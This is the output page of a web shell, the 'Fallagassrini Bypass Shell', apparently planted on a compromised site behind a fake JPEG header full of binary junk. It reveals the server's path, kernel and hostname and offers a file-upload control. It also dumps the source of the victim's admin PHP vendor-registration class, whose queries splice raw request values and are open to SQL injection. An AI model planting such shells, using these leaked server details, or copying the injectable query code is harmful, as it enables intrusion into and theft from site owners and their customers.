JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/admin/includes/classes/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/admin/includes/classes/class.vendorReg.php

<?php
#####Class For Adding Content Management ######
class vendorReg extends MysqlFns{
 
 /* class constructor */
 function vendorReg(){
 $this->LDDisplayPath= $config['SiteGlobalPath']."class.vendorReg.php";
     global $objSmarty,$config;
	$tbl = $config['DBPrefix'];

  $this->MysqlFns();
  $this->Limit = 20;
   $this->Keyword = '';
  $this->Operator = '';
  $this->PerPage = '';
  
  
  	$SelQuerys	= 'SELECT max(supplier_code) as last FROM `arka_supplier_reg_master` Limit 0,1';
   		$SupDetail	= $this->ExecuteQuery($SelQuerys, 'select');
   
   		if($SupDetail[0]['last']!="")
   		{
			$SupDetail[0]['supplier_code'] = stripslashes($SupDetail[0]['last']);
			$s_id1 = preg_replace("/[^0-9\.]/", '', $SupDetail[0]['supplier_code']);
			$s_id1= $s_id1 + 1;
			$str = str_split($SupDetail[0]['last'], 3);
			$s_id = $str[0]. "" .$s_id1;
   		} else
   		{
   		   $s_id = "SUP10001";
   		}
		$objSmarty->assign('s_id', $s_id);
  

  
	
 }

 //Create FCK Editor
 function CreateFCKeditor($value = ''){
     global $objSmarty,$config;
	$tbl = $config['DBPrefix'];


  include($config['FckEditorPath'] . '/fckeditor.php');
  $sBasePath = $config['SiteFCKEditorBasePath'];

  $oFCKeditor 			= new FCKeditor('content') ;
  $oFCKeditor->BasePath	= $sBasePath ;
  $oFCKeditor->Width		= 600 ;
  $oFCKeditor->Height		= 450 ;
  $oFCKeditor->Value		= $value;
  $objSmarty->assign('Editor', $oFCKeditor->Create());
 }
 
 
 /* Delete the Static Page */
 function DeleteCus($CusIdent){
    global $objSmarty,$config;
	$tbl = $config['DBPrefix'];

  foreach ( $CusIdent as $ConId ){
   if($ConId){
    $DelQuery = 'DELETE FROM `arka_site_reg_master` WHERE `site_id` ='.$ConId;
	$this->ExecuteQuery($DelQuery, 'delete');
   }
  }
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  return true;
 }
 
/*	function DeleteID($id)
	{
  		global $objSmarty;
  		$DelQuery = 'update  `arka_supplier_reg_master` set `record_status` = 0 WHERE `customer_id`="'.$_GET['customer_id'].'" '; 
  		$this->ExecuteQuery($DelQuery, 'delete');
  		$objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
 	}*/
 /* Insert the content for  Static Pages */
 
 function InsertSupplierContent($objArray){
      global $objSmarty,$config,$_POST;
	$tbl = $config['DBPrefix'];



   if(!$objArray['supplierCode']){
    $objSmarty->assign('ErrorMessage', 'Supplier Code should not be blank');
	return false;
   }elseif(!$objArray['supplierName']){
    $objSmarty->assign('ErrorMessage', 'Supplier Name should not be blank');
	return false;
   }elseif(!$objArray['vatNo']){
    $objSmarty->assign('ErrorMessage', 'VAT No should not be blank');
	return false;
   }elseif(!$objArray['serviceTaxNo']){
    $objSmarty->assign('ErrorMessage', 'Service Tax No should not be blank');
	return false;
   }elseif(!$objArray['city']){
    $objSmarty->assign('ErrorMessage', 'City should not be blank');
	return false;
   }elseif(!$objArray['state']){
    $objSmarty->assign('ErrorMessage', 'State should not be blank');
	return false;
   }elseif(!$objArray['pincode']){
    $objSmarty->assign('ErrorMessage', 'Pincode should not be blank');
	return false;
   }/*elseif(!preg_match("/^[0-9]{6}$/",$objArray['pincode'])){
    $objSmarty->assign('ErrorMessage', 'Pincode should be numeric and 6 Digits');
	return false;
   }*/elseif(!$objArray['panNo']){
    $objSmarty->assign('ErrorMessage', 'PAN No should not be blank');
	return false;
   }elseif(!$objArray['cstNo']){
    $objSmarty->assign('ErrorMessage', 'CST No should not be blank');
	return false;
   }elseif(!$objArray['contactPerson']){
    $objSmarty->assign('ErrorMessage', 'ContactPerson should not be blank');
	return false;
   }elseif(!$objArray['mobile']){
    $objSmarty->assign('ErrorMessage', 'Mobile  should not be blank');
	return false;
   }elseif(!$objArray['email']){
    $objSmarty->assign('ErrorMessage', 'Email should not be blank');
	return false;
   }/*elseif(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/", $objArray['email'])){
    $objSmarty->assign('ErrorMessage', 'Email is not valid');
	return false;
   }*/elseif(!$objArray['createdDate']){
    $objSmarty->assign('ErrorMessage', 'Created Date should not be blank');
	return false;
   }elseif(!$objArray['createdBy']){
    $objSmarty->assign('ErrorMessage', 'Created by should not be blank');
	return false;
   }
  /* if($this->chk_previous_data($objArray))
   */
   
  // if($this->ChkDupliCust($objArray))
  // $objSmarty->assign('supplier_code', $objArray['supplierCode']);
   if($objArray['vatNo']){
   $InsQuery = 'INSERT INTO `arka_supplier_reg_master`(`supplier_code`,`supplier_name`,`area`,`vat_no`,`servicetax_no`, `address`, `address2`, `city`, `state`,`pincode`,`pan_no`,`cst_no`, `contact_person`, `designation`, `mobile_no`, `phone_no`, `email`, `created_date`, `created_time`, `created_by`, `record_status`) VALUES("'.trim(addslashes($objArray['supplierCode'])).'","'.trim(addslashes($objArray['supplierName'])).'","'.trim(addslashes($objArray['area'])).'","'.trim(addslashes($objArray['vatNo'])).'","'.trim(addslashes($objArray['serviceTaxNo'])).'","'.trim(addslashes($objArray['address'])).'","'.trim(addslashes($objArray['address2'])).'","'.trim(addslashes($objArray['city'])).'","'.trim(addslashes($objArray['state'])).'","'.trim(addslashes($objArray['pincode'])).'","'.trim(addslashes($objArray['panNo'])).'","'.trim(addslashes($objArray['cstNo'])).'","'.trim(addslashes($objArray['contactPerson'])).'","'.trim(addslashes($objArray['designation'])).'","'.trim(addslashes($objArray['mobile'])).'","'.trim(addslashes($objArray['phone'])).'","'.trim(addslashes($objArray['email'])).'","'.trim(addslashes($objArray['createdDate'])).'","'.trim(addslashes($objArray['createdTime'])).'","'.trim(addslashes($objArray['createdBy'])).'","1")';
  	 $this->ExecuteQuery($InsQuery, 'insert');
	// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['supplierCode'].'&window_action=true');
	


	$oFCKeditor->Value		= '';
	$objSmarty->assign('supplierCode',$objArray['supplierCode']);
	$objSmarty->assign('supplierCode', '');
	$url_addtnal_data=base64_encode("New Supplier Added Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?server_response=success&sm=".$url_addtnal_data."&supplier_id=".$objArray['supplierCode']);
	//PrePopulate($objArray, 'CusDetail');
	  }
 }
/* else 
 {
 
 $UpQuery = 'UPDATE `arka_supplier_reg_master` SET `supplier_name` = "'.trim($objArray['sname']).'",`vat_no` = "'.trim($objArray['vat_no']).'",`service_tax_no` = "'.trim($objArray['service_tax_no']).'",`pan_no` = "'.trim($objArray['pan_no']).'",`cst_no` = "'.trim($objArray['cst_no']).'",`address1` = "'.trim($objArray['address1']).'", `address2` = "'.trim($objArray['address2']).'", `city` = "'.trim($objArray['city']).'", `state` = "'.trim($objArray['state']).'", `pincode` = "'.trim($objArray['pincode']).'", `contact_person` = "'.trim($objArray['contactperson']).'", `designation` = "'.trim($objArray['designation']).'", `mobile` = "'.trim($objArray['mobile']).'", `phone` = "'.trim(addslashes($objArray['phone'])).'", `email` = "'.trim(addslashes($objArray['email'])).'", `created_date` = "'.trim(addslashes($objArray['cr_date'])).'",`created_time` ="'.trim(addslashes($objArray['crtime'])).'", `status` = "1" WHERE `supplier_code` ="'.trim($objArray['s_code']).'"';
	$this->ExecuteQuery($UpQuery, 'update');

	//$this->GetSupplierView($objArray);
	$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;

 
   // $url_addtnal_data=base64_encode("Supplier Details Already Exists");
   // header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data);
 }
 */
 //
 /*else
 {
     $objSmarty->assign('ErrorMessage', 'Supplier Details Already Exists');
	 
     //$url_addtnal_data=base64_encode("Supplier Details Already Exists");
   //  header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
 }*/
 
 
  /* Edit the Static Page */
 function EditVendor($objArray){ 

     global $objSmarty,$config,$_POST;
	$tbl = $config['DBPrefix'];

 // $CusIdent=$_REQUEST['s_code'];
  $objSmarty->assign('Keyword', $this->Keyword);
  $objSmarty->assign('Operator', $this->Operator);
  $objSmarty->assign('Offset', $this->Offset);
  $objSmarty->assign('PerPage', $this->PerPage);
  
   if(!$objArray['supplierCode']){
	$objSmarty->assign('ErrorMessage', 'Supplier Code should not be blank');
	return false;
   }/*elseif(!$objArray['supplierName']){
	$objSmarty->assign('ErrorMessage', 'Supplier Name should not be blank');
	return false;
   }*/elseif(!$objArray['vatNo']){
	$objSmarty->assign('ErrorMessage', 'vat No should not be blank');
	return false;
   }elseif(!$objArray['serviceTaxNo']){
	$objSmarty->assign('ErrorMessage', 'ServiceTax No should not be blank');	
	return false;
   }elseif(!$objArray['city']){
	$objSmarty->assign('ErrorMessage', 'City should not be blank');	
	return false;
   }elseif(!$objArray['state']){
	$objSmarty->assign('ErrorMessage', 'State should not be blank');
	return false;
   }elseif(!$objArray['pincode']){
	$objSmarty->assign('ErrorMessage', 'pin Code should not be blank');
	return false;
   }/*elseif(!preg_match("/^[0-9]{6}$/",$objArray['pincode'])){
	$objSmarty->assign('ErrorMessage', 'Supplier Code should not be blank');
	return false;
   }*/elseif(!$objArray['panNo']){
	$objSmarty->assign('ErrorMessage', 'pan No should not be blank');
	return false;
   }elseif(!$objArray['cstNo']){
	$objSmarty->assign('ErrorMessage', 'cst No should not be blank');	
	return false;
   }elseif(!$objArray['contactPerson']){
	$objSmarty->assign('ErrorMessage', 'contactPerson should not be blank');	
	return false;
   }/*elseif(!$objArray['company_name']){
	$objSmarty->assign('ErrorMessage', 'Company Name should not be blank');
	return false;
   }*/elseif(!$objArray['mobile']){
	$objSmarty->assign('ErrorMessage', 'mobile should not be blank');
	return false;
   }elseif(!$objArray['email']){
	$objSmarty->assign('ErrorMessage', 'email  should not be blank');
	return false;
   }/*elseif(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/", $objArray['email'])){
	$url_addtnal_data=base64_encode("Email is not valid");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);		
	return false;
   }*/elseif(!$objArray['createdDate']){
	$objSmarty->assign('ErrorMessage', 'created Date should not be blank');
	return false;
   }elseif(!$objArray['createdTime']){
	$objSmarty->assign('ErrorMessage', 'created Time should not be blank');
	return false;
   } 
 /*  if($this->ChkDupliCust($objArray)) 
    $objSmarty->assign('s_code', $objArray['s_code']);
   if($objArray['s_code'] && $objArray['sname'])*/
   if($objArray['supplierCode']){
  	$UpQuery = 'UPDATE `arka_supplier_reg_master` SET `supplier_name` = "'.trim($objArray['supplierName']).'",`area` = "'.trim($objArray['area']).'",`vat_no` = "'.trim($objArray['vatNo']).'",`servicetax_no` = "'.trim($objArray['serviceTaxNo']).'",`pan_no` = "'.trim($objArray['panNo']).'",`cst_no` = "'.trim($objArray['cstNo']).'",`address` = "'.trim($objArray['address']).'", `address2` = "'.trim($objArray['address2']).'", `city` = "'.trim($objArray['city']).'", `state` = "'.trim($objArray['state']).'", `pincode` = "'.trim($objArray['pincode']).'", `contact_person` = "'.trim($objArray['contactPerson']).'",`mobile_no` = "'.trim($objArray['mobile']).'", `phone_no` = "'.trim(addslashes($objArray['phone'])).'", `email` = "'.trim(addslashes($objArray['email'])).'", `created_date` = "'.trim(addslashes($objArray['createdDate'])).'",`created_time` ="'.trim(addslashes($objArray['createdTime'])).'", `record_status` = "1" WHERE `supplier_code` ="'.trim($objArray['supplierCode']).'"';
	$this->ExecuteQuery($UpQuery, 'update');
// header('Location:' .$_SERVER['PHP_SELF'].'?server_response=success&supplier_code='.$objArray['supplierCode'].'&window_action=true');
 header('Location:' .$_SERVER['PHP_SELF'].'?supplier_code='.$_GET['supplier_code'].'&server_response=update success');	
	//$this->GetSupplierView($objArray);
	/*$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");
    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;*/
}
   }
  
 /*}
  else 
 {
 
     $SelQuery2		= 'SELECT `supplier_name`,`address1`,`address2`,`city`,`state`,`pincode`,`contact_person`,`designation`,`mobile`,`phone`,`email`,`created_date` FROM `arka_supplier_reg_master` WHERE `supplier_code` = "'.$objArray['s_code'].'"  Limit 0,1';
     $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
 
     $SelQuery3		= 'SELECT `supplier_name`,`address1`,`address2`,`city`,`state`,`pincode`,`contact_person`,`designation`,`mobile`,`phone`,`email`,`created_date` FROM `arka_supplier_reg_master` WHERE `supplier_name` = "'.$objArray['sname'].'" AND `address1` = "'.$objArray['address1'].'" AND `address2` = "'.$objArray['address2'].'" AND `city` = "'.$objArray['city'].'" AND `state` = "'.$objArray['state'].'" AND `pincode` = "'.$objArray['pincode'].'" AND `contact_person` = "'.$objArray['contactperson'].'" AND `designation` = "'.$objArray['designation'].'" AND  `mobile` = "'.$objArray['mobile'].'" AND `phone` = "'.$objArray['phone'].'" AND `email` = "'.$objArray['email'].'" AND `created_date` = "'.$objArray['cr_date'].'"  Limit 0,1';
  $CusDetail2		= $this->ExecuteQuery($SelQuery3, 'select');
  
  if($CusDetail==$CusDetail2)
  {
   $url_addtnal_data=base64_encode("Supplier Details Already Exists");
    header('location:'.$_SERVER['PHP_SELF']."?em=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return false;
  }
  else
  {
  
  
     	$UpQuery = 'UPDATE `arka_supplier_reg_master` SET `supplier_name` = "'.trim($objArray['sname']).'",`vat_no` = "'.trim($objArray['vat_no']).'",`service_tax_no` = "'.trim($objArray['service_tax_no']).'",`pan_no` = "'.trim($objArray['pan_no']).'",`cst_no` = "'.trim($objArray['cst_no']).'",`address1` = "'.trim($objArray['address1']).'", `address2` = "'.trim($objArray['address2']).'", `city` = "'.trim($objArray['city']).'", `state` = "'.trim($objArray['state']).'", `pincode` = "'.trim($objArray['pincode']).'", `contact_person` = "'.trim($objArray['contactperson']).'", `designation` = "'.trim($objArray['designation']).'", `mobile` = "'.trim($objArray['mobile']).'", `phone` = "'.trim(addslashes($objArray['phone'])).'", `email` = "'.trim(addslashes($objArray['email'])).'", `created_date` = "'.trim(addslashes($objArray['cr_date'])).'",`created_time` ="'.trim(addslashes($objArray['crtime'])).'", `status` = "1" WHERE `supplier_code` ="'.trim($objArray['s_code']).'"';
	$this->ExecuteQuery($UpQuery, 'update');
  
  
  	$url_addtnal_data=base64_encode("Supplier Details Updated Successfully");

    header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data."&supplier_id=".$objArray['s_code']);
	return true;
  }
  
 }
 
 }*/
 
 
 /* Validation for Static Pages */
 function ChkDupliCust($c_id){
  global $objSmarty;
  if(!empty($c_id))
  echo $c_id;
 // $WhereClause	= ' AND `id` != '.$Ident;
 $SelQuery2		= 'SELECT * FROM `arka_supplier_reg_master` WHERE `supplier_code` = "'.$c_id['cst_no'].'" Limit 0,1';
  $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
  if(!empty($CusDetail) && is_array($CusDetail))
   return false;
  else
   return true;
 }
 
 
 function chk_previous_data($c_id){
  global $objSmarty;
  
  if(!empty($c_id))
 // $WhereClause	= ' AND `id` != '.$Ident;
  $SelQuery2		= 'SELECT * FROM `arka_supplier_reg_master` WHERE `vat_no` = "'.$c_id['vat_no'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'"  AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'" OR `cst_no` = "'.$c_id['cst_no'].'" AND `record_status`=1 AND `supplier_code`!= "'.$c_id['s_code'].'"  Limit 0,1';
  $CusDetail		= $this->ExecuteQuery($SelQuery2, 'select');
  if(!empty($CusDetail) && is_array($CusDetail))
   return false;
  else
   return true;
 }
 
 
 /* Delete the Static Page */
 function DeleteID($id){
  global $objSmarty;
  $UpQuery1 = 'update `arka_supplier_reg_master` set record_status ="0" WHERE `supplier_code`="'.$_GET['supplier_code'].'"';
$this->ExecuteQuery($UpQuery1, 'delete');
// header('Location:' .$_SERVER['PHP_SELF'].'?supplier_code='.$_GET['supplier_code'].'&server_response=update success');	
  header('Location:' .$_SERVER['PHP_SELF'].'?server_response=delete_success');
 }
 /*Roles list */
 
  function RoleList(){
	global $objSmarty;
	 $SelQuery1	= 'SELECT role_name FROM arka_group_mapping WHERE `group_name` = "'.$_SESSION['USER_GROUP'].'" ORDER BY sl_no';
	  $RL		= $this->ExecuteQuery($SelQuery1, "select");

  if(!empty($RL) && is_array($RL))
   foreach($RL as $key=>$value){
    $RL[$key]['role_id'] = stripslashes($RL[$key]['role_id']);
	$RL[$key]['role_name'] = stripslashes($RL[$key]['role_name']);
	$objSmarty->assign('RList', $RL);
  return $RL;
		}
	}
	
 function GetVendorDetails($objArray='')  
	{
		global $objSmarty;
		$SelQuery4 = 'SELECT * FROM `arka_supplier_reg_master` WHERE supplier_code ="'.$_GET['supplier_code'].'" AND record_status="1"' ;
		$PageList2		= $this->ExecuteQuery($SelQuery4, "select");
        $objSmarty->assign('PageList2', $PageList2);
	}	
	function GetVendorList($objArray='')  
	{
		global $objSmarty;
		$SelQuery5 = 'SELECT * FROM `arka_supplier_reg_master` WHERE record_status="1" ORDER BY supplier_code' ;
		$PageList		= $this->ExecuteQuery($SelQuery5, "select");
        $objSmarty->assign('PageList', $PageList);
	}	
	
  }

?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net